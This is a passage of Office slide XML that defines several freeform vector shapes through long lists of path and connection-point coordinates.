                <a:cxn ang="0">
                  <a:pos x="103" y="40"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="110" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="30"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="124" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="127" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="144" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="144" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="141" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="137" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="72"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="125" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="112" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="106" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="101" y="91"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="87" y="91"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="80" y="91"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="72" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="65" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="48" y="82"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="32" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="11" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="61"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="61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144" h="93">
                  <a:moveTo>
                    <a:pt x="27" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29" y="0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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="65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EB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Freeform 18"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4584" y="1766"/>
              <a:ext cx="71" cy="39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4" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="14" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="27" y="56"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="33" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="38" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="42" y="67"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="50" y="71"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="55" y="73"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="75"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="69" y="75"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="90" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="103" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="109" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="124" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="130" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="143" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="128" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="122" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="112" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="107" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="103" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="97" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="92" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="86" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="35"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="33"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="73" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="29"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="59" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="52" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="48" y="14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43" h="78">
                  <a:moveTo>
                    <a:pt x="40" y="0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4" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="29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52" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="14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Freeform 19"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4767" y="1664"/>
              <a:ext cx="109" cy="74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8" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="21" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="32" y="34"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="48" y="26"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="61" y="21"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="70" y="17"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="91" y="11"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="103" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="126" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="137" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="162" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="181" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="196" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="209" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="217" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="215" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="204" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="181" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="169" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="160" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="154" y="72"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="152" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="141" y="70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="129" y="70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="103" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="88" y="70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="72" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="57" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="89"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="32" y="101"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="21" y="114"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="12" y="125"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="6" y="135"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="146"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="70"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="219" h="148">
                  <a:moveTo>
                    <a:pt x="0" y="70"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="7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3" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150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67" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177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196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5" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="141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Freeform 20"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5119" y="1644"/>
              <a:ext cx="110" cy="59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10" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="32"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="31" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="46" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="57" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="78" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="88" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="97" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="109" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="118" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="130" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="141" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="151" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="162" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="173" y="4"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="185" y="8"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="202" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="213" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="221" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="40"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="185" y="40"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="160" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="141" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="126" y="51"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="109" y="55"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="94" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="78" y="70"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="63" y="78"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="52" y="87"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="42" y="97"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="29" y="110"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="112"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="105"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="14" y="91"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="10" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="57"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="49"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="221" h="118">
                  <a:moveTo>
                    <a:pt x="0" y="49"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2" y="46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6" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9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30" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141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8" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="110"/>
                  </a:lnTo>
